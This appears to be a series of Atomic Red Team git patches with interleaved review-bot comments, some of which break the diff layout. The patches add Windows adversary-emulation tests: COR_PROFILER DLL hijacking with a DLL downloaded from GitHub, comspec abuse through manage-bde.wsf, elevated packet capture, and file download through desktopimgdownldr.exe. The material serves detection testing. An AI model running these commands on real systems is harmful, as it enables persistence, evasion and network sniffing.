+ +## Atomic Test #3 - Registry-free process scope COR_PROFILER +Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. + +Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_name | unamanged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll| +| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$env:COR_ENABLE_PROFILING = 1 +$env:COR_PROFILER = '#{clsid_guid}' +$env:COR_PROFILER_PATH = '#{file_name}' +POWERSHELL -c 'Start-Sleep 1' +``` + +#### Cleanup Commands: +```powershell +$env:COR_ENABLE_PROFILING = 0 +$env:COR_PROFILER = '' +$env:COR_PROFILER_PATH = '' +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: #{file_name} must be present +##### Check Prereq Commands: +```powershell +if (Test-Path #{file_name}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" +``` + + + + +
From 55785dfd6a9b19f6e78e6763c57e57973a41ee8d Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Tue, 18 Aug 2020 16:38:09 -0600 Subject: [PATCH 09/19] include full path to manage-bde.wsf --- atomics/T1216/T1216.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml index 466c30d5..855b428b 100644 --- a/atomics/T1216/T1216.yaml +++ b/atomics/T1216/T1216.yaml @@ -27,12 +27,12 @@ atomic_tests: command_to_execute: description: A command to execute. type: Path - default: C:\Windows\System32\calc.exe + default: '%windir%\System32\calc.exe' executor: command: | set comspec=#{command_to_execute} - cscript manage-bde.wsf + cscript %windir%\System32\manage-bde.wsf cleanup_command: | - set comspec=C:\Windows\System32\cmd.exe + set comspec=%windir%\System32\cmd.exe name: command_prompt From 232e7e9a0e0e0533bfb8b6bf23383118c8a2da60 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 18 Aug 2020 22:39:29 +0000 Subject: [PATCH 10/19] Generate docs from job=validate_atomics_generate_docs branch=clr2of8-patch-6 --- atomics/Indexes/index.yaml | 6 +++--- atomics/T1216/T1216.md | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a799a220..e9c414e6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -33063,12 +33063,12 @@ defense-evasion: command_to_execute: description: A command to execute. type: Path - default: C:\Windows\System32\calc.exe + default: "%windir%\\System32\\calc.exe" executor: command: | set comspec=#{command_to_execute} - cscript manage-bde.wsf - cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe + cscript %windir%\System32\manage-bde.wsf + cleanup_command: 'set comspec=%windir%\System32\cmd.exe ' name: command_prompt diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md index c2802d6b..c5ac55a8 100644 --- a/atomics/T1216/T1216.md 
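Review bot: Now that the executor names an absolute path in `cscript %windir%\System32\manage-bde.wsf`, the test still has no `dependencies` entry confirming the script is present, so on an edition without the BitLocker tooling the run fails with a cscript error instead of a clear prerequisite message; a `prereq_command` of `if exist "%windir%\System32\manage-bde.wsf" (exit 0) else (exit 1)` under `dependency_executor_name: command_prompt` would cover that. The cleanup line `set comspec=%windir%\System32\cmd.exe` also assumes the prior value was the default rather than restoring what was there; if the executor and cleanup run in separate `cmd.exe` processes, the `set` in the executor never outlives that process anyway, which is worth stating in the description so readers do not expect a persistent change. The `command_to_execute` argument is typed `Path` while its new default `'%windir%\System32\calc.exe'` holds an unexpanded environment variable, which any consumer that validates paths before expansion may reject.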
+++ b/atomics/T1216/T1216.md @@ -52,7 +52,7 @@ Executes the signed manage-bde.wsf script with options to execute an arbitrary c #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| command_to_execute | A command to execute. | Path | C:\Windows\System32\calc.exe| +| command_to_execute | A command to execute. | Path | %windir%\System32\calc.exe| #### Attack Commands: Run with `command_prompt`! @@ -60,12 +60,12 @@ Executes the signed manage-bde.wsf script with options to execute an arbitrary c ```cmd set comspec=#{command_to_execute} -cscript manage-bde.wsf +cscript %windir%\System32\manage-bde.wsf ``` #### Cleanup Commands: ```cmd -set comspec=C:\Windows\System32\cmd.exe +set comspec=%windir%\System32\cmd.exe ``` From 496b3e5ebfe426d74da880d94c9811eff14bc670 Mon Sep 17 00:00:00 2001 From: clr2of8 Date: Wed, 19 Aug 2020 09:29:26 -0600 Subject: [PATCH 11/19] fix csv link --- README.md | 2 +- atomics/Indexes/Indexes-Markdown/tmp.txt | 0 atomics/Indexes/Matrices/tmp.txt | 0 3 files changed, 1 insertion(+), 1 deletion(-) delete mode 100644 atomics/Indexes/Indexes-Markdown/tmp.txt delete mode 100644 atomics/Indexes/Matrices/tmp.txt diff --git a/README.md b/README.md index 3b79cc8a..51788ec0 100644 --- a/README.md +++ b/README.md 
@@ -40,7 +40,7 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr * [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team) * Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks) -* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index-by-tactic.md)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md) +* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md) - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv)) - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv)) - Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv)) diff --git a/atomics/Indexes/Indexes-Markdown/tmp.txt b/atomics/Indexes/Indexes-Markdown/tmp.txt deleted file mode 100644 index e69de29b..00000000 diff --git a/atomics/Indexes/Matrices/tmp.txt b/atomics/Indexes/Matrices/tmp.txt deleted file mode 100644 index e69de29b..00000000 From ee7deb22fd2ac8a4968d002c629b73abd58aff3a Mon Sep 17 00:00:00 2001 From: bbucao <57825239+bbucao@users.noreply.github.com> Date: Thu, 20 Aug 2020 15:21:07 -0500 Subject: [PATCH 12/19] Update to T1040.yaml test 3 "Packet capture windows command prompt" (#1208) --- atomics/T1040/T1040.yaml | 24 ++++++++++++++++++++---- 1 file changed, 20 insertions(+), 4 deletions(-) 
diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index ba0df937..9105fe8b 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml @@ -59,20 +59,36 @@ atomic_tests: auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca description: | Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark - installed, along with WinPCAP. Windump will require the windump executable. + installed. - Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0. + Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet". supported_platforms: - windows input_arguments: interface: description: Specify interface to perform PCAP on. type: String - default: Ethernet0 + default: Ethernet + wireshark_url: + description: wireshark installer download URL + type: url + default: https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe + tshark_path: + description: path to tshark.exe + type: path + default: c:\program files\wireshark\tshark.exe + dependency_executor_name: powershell + dependencies: + - description: | + tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". + prereq_command: + if (test-path "#{tshark_path}") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} + Start-Process $env:temp\wireshark_installer.exe /S executor: command: | "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - c:\windump.exe name: command_prompt elevation_required: true From 7e5f711d57412e46b4abfece70056458cbd16483 Mon Sep 17 00:00:00 2001 
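Review bot: The new `tshark_path` input is only consulted by `prereq_command`; the executor line still hard-codes `"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5`, so a user who overrides `tshark_path` passes the prereq and then fails at run time — it should read `"#{tshark_path}" -i #{interface} -c 5`. `Start-Process $env:temp\wireshark_installer.exe /S` returns as soon as the installer process starts; adding `-Wait` avoids the prereq being re-checked against a half-written install tree, assuming the framework re-runs the check right after `get_prereq_command`. The installer is downloaded from `#{wireshark_url}` and executed with no integrity check; a `Get-AuthenticodeSignature` status test on the saved file before `Start-Process` would catch a tampered mirror or download, which matters since this runs elevated. As far as I know Wireshark's `/S` silent install does not install Npcap, so even a successful install may leave `tshark -i` unable to capture; the description's "tshark must be installed" dependency may need to mention that.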
From: CircleCI Atomic Red Team doc generator Date: Thu, 20 Aug 2020 20:21:38 +0000 Subject: [PATCH 13/19] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/Indexes/index.yaml | 60 ++++++++++++++++++++++++++++++-------- atomics/T1040/T1040.md | 22 +++++++++++--- 2 files changed, 66 insertions(+), 16 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e9c414e6..7f7a293a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -19353,20 +19353,38 @@ credential-access: auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca description: | Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark - installed, along with WinPCAP. Windump will require the windump executable. + installed. - Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0. + Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet". supported_platforms: - windows input_arguments: interface: description: Specify interface to perform PCAP on. type: String - default: Ethernet0 + default: Ethernet + wireshark_url: + description: wireshark installer download URL + type: url + default: https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe + tshark_path: + description: path to tshark.exe + type: path + default: c:\program files\wireshark\tshark.exe + dependency_executor_name: powershell + dependencies: + - description: 'tshark must be installed and in the default path of "c:\Program + Files\Wireshark\Tshark.exe". + +' + prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} + Start-Process $env:temp\wireshark_installer.exe /S executor: - command: | - "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - c:\windump.exe + command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 + +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture 
@@ -39188,20 +39206,38 @@ discovery: auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca description: | Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark - installed, along with WinPCAP. Windump will require the windump executable. + installed. - Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0. + Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet". supported_platforms: - windows input_arguments: interface: description: Specify interface to perform PCAP on. type: String - default: Ethernet0 + default: Ethernet + wireshark_url: + description: wireshark installer download URL + type: url + default: https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe + tshark_path: + description: path to tshark.exe + type: path + default: c:\program files\wireshark\tshark.exe + dependency_executor_name: powershell + dependencies: + - description: 'tshark must be installed and in the default path of "c:\Program + Files\Wireshark\Tshark.exe". + +' + prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} + Start-Process $env:temp\wireshark_installer.exe /S executor: - command: | - "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - c:\windump.exe + command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 + +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md index e41c7a1c..09551825 100644 --- a/atomics/T1040/T1040.md +++ b/atomics/T1040/T1040.md 
@@ -109,9 +109,9 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1; ## Atomic Test #3 - Packet Capture Windows Command Prompt Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark -installed, along with WinPCAP. Windump will require the windump executable. +installed. -Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0. +Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet". **Supported Platforms:** Windows @@ -121,7 +121,9 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| interface | Specify interface to perform PCAP on. | String | Ethernet0| +| interface | Specify interface to perform PCAP on. | String | Ethernet| +| wireshark_url | wireshark installer download URL | url | https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe| +| tshark_path | path to tshark.exe | path | c:\program files\wireshark\tshark.exe| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) @@ -129,12 +131,24 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac ```cmd "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -c:\windump.exe ``` +#### Dependencies: Run with `powershell`! +##### Description: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". +##### Check Prereq Commands: +```powershell +if (test-path "#{tshark_path}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} +Start-Process $env:temp\wireshark_installer.exe /S +``` + +
From c8be2137d7079688c40166caa235ab3b13075731 Mon Sep 17 00:00:00 2001 From: Brandon Morgan Date: Thu, 20 Aug 2020 15:27:09 -0500 Subject: [PATCH 14/19] T1197 desktopimgdwnldr.exe (#1206) * Update T1197.yaml desktopimgdownldr.exe initial commit * Update T1197.yaml fixed parsing issue with command Co-authored-by: Carrie Roberts --- atomics/T1197/T1197.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index 9db84377..86e316cf 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -82,3 +82,34 @@ atomic_tests: cleanup_command: | del #{local_file} >nul 2>&1 name: command_prompt +- name: Bits download using destktopimgdownldr.exe (cmd) + description: | + This test simulates using destopimgdwnldr.exe to download a malicious file + instead of a desktop or lockscreen background img. The process that actually makes + the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) + and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ + supported_platforms: + - windows + input_arguments: + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + download_path: + description: Local file path to save downloaded file + type: path + default: 'SYSTEMROOT=C:\Windows\Temp' + cleanup_path: + description: path to delete file as part of cleanup_command + type: path + default: C:\Windows\Temp\Personalization\LockScreenImage + cleanup_file: + description: file to remove as part of cleanup_command + type: string + default: "*.md" + executor: + command: | + set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr + cleanup_command: | + del #{cleanup_path}\#{cleanup_file} + name: command_prompt 
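Review bot: `download_path` is declared with `type: path` and described as "Local file path to save downloaded file", but its default `SYSTEMROOT=C:\Windows\Temp` is a `VAR=value` assignment consumed by `set "#{download_path}"`, and `cleanup_path` is an independent hard-coded default derived from it, so overriding one without the other leaves the downloaded file behind. Making `download_path` a real directory and building the assignment in the command keeps the two in step: `set "SYSTEMROOT=#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr` with cleanup `del #{download_path}\Personalization\LockScreenImage\#{cleanup_file} >nul 2>&1` (the `>nul 2>&1` matches the sibling test's `del #{local_file} >nul 2>&1`), after which `cleanup_path` can be dropped. The test `name` also carries a typo (`destktopimgdownldr.exe`, and `destopimgdwnldr.exe` in the description); since the name is the identifier used by `-TestNames` and is copied into the generated index and docs, it is worth correcting to `desktopimgdownldr.exe` before it propagates.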
From 84054abce5a3e88a790a7256e727948d65e749b4 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 20 Aug 2020 20:28:30 +0000 Subject: [PATCH 15/19] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 70 +++++++++++++++++++ atomics/T1197/T1197.md | 41 +++++++++++ atomics/T1197/T1197.yaml | 1 + atomics/used_guids.txt | 1 + 8 files changed, 121 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index bd7593db..263328c3 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -92,6 +92,7 @@ persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-92 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt +persistence,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual 
@@ -211,6 +212,7 @@ defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C# defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt +defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e04b500f..96b07c16 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -56,6 +56,7 @@ defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C# defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt +defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell defense-evasion,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt @@ -206,6 +207,7 @@ persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-92 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt +persistence,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual 
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 65d973af..04048f47 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -196,6 +196,7 @@ - Atomic Test #1: Bitsadmin Download (cmd) [windows] - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - Atomic Test #3: Persist, Download, & Execute [windows] + - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows] - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -453,6 +454,7 @@ - Atomic Test #1: Bitsadmin Download (cmd) [windows] - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - Atomic Test #3: Persist, Download, & Execute [windows] + - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows] - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md) - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 63b7389c..9cebd745 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -126,6 +126,7 @@ - Atomic Test #1: Bitsadmin Download (cmd) [windows] - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - Atomic Test #3: Persist, Download, & Execute [windows] + - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows] - T1027.001 Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md) @@ -394,6 +395,7 @@ - Atomic Test #1: Bitsadmin Download (cmd) [windows] - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - Atomic Test #3: Persist, Download, & Execute [windows] + - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows] - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 7f7a293a..52dc0d30 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -9487,6 +9487,41 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 +' + name: command_prompt + - name: Bits download using destktopimgdownldr.exe (cmd) + auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 + description: "This test simulates using destopimgdwnldr.exe to download a malicious + file\ninstead of a desktop or lockscreen background img. The process that + actually makes \nthe TCP connection and creates the file on the disk is a + svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe. + See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n" + supported_platforms: + - windows + input_arguments: + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + download_path: + description: Local file path to save downloaded file + type: path + default: SYSTEMROOT=C:\Windows\Temp + cleanup_path: + description: path to delete file as part of cleanup_command + type: path + default: C:\Windows\Temp\Personalization\LockScreenImage + cleanup_file: + description: file to remove as part of cleanup_command + type: string + default: "*.md" + executor: + command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} + /eventName:desktopimgdownldr + +' + cleanup_command: 'del #{cleanup_path}\#{cleanup_file} + ' name: command_prompt T1547: 
@@ -21438,6 +21473,41 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 +' + name: command_prompt + - name: Bits download using destktopimgdownldr.exe (cmd) + auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 + description: "This test simulates using destopimgdwnldr.exe to download a malicious + file\ninstead of a desktop or lockscreen background img. The process that + actually makes \nthe TCP connection and creates the file on the disk is a + svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe. + See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n" + supported_platforms: + - windows + input_arguments: + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + download_path: + description: Local file path to save downloaded file + type: path + default: SYSTEMROOT=C:\Windows\Temp + cleanup_path: + description: path to delete file as part of cleanup_command + type: path + default: C:\Windows\Temp\Personalization\LockScreenImage + cleanup_file: + description: file to remove as part of cleanup_command + type: string + default: "*.md" + executor: + command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} + /eventName:desktopimgdownldr + +' + cleanup_command: 'del #{cleanup_path}\#{cleanup_file} + ' name: command_prompt T1027.001: diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index 5c9b581e..59323363 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -16,6 +16,8 @@ BITS upload functionalities can also be used to perform [Exfiltration Over Alter - [Atomic Test #3 - Persist, Download, & Execute](#atomic-test-3---persist-download--execute) +- [Atomic Test #4 - Bits download using destktopimgdownldr.exe (cmd)](#atomic-test-4---bits-download-using-destktopimgdownldrexe-cmd) +
@@ -130,4 +132,43 @@ del #{local_file} >nul 2>&1 +
+
+ +## Atomic Test #4 - Bits download using destktopimgdownldr.exe (cmd) +This test simulates using destopimgdwnldr.exe to download a malicious file +instead of a desktop or lockscreen background img. The process that actually makes +the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) +and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| +| download_path | Local file path to save downloaded file | path | SYSTEMROOT=C:\Windows\Temp| +| cleanup_path | path to delete file as part of cleanup_command | path | C:\Windows\Temp\Personalization\LockScreenImage| +| cleanup_file | file to remove as part of cleanup_command | string | *.md| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr +``` + +#### Cleanup Commands: +```cmd +del #{cleanup_path}\#{cleanup_file} +``` + + + + +
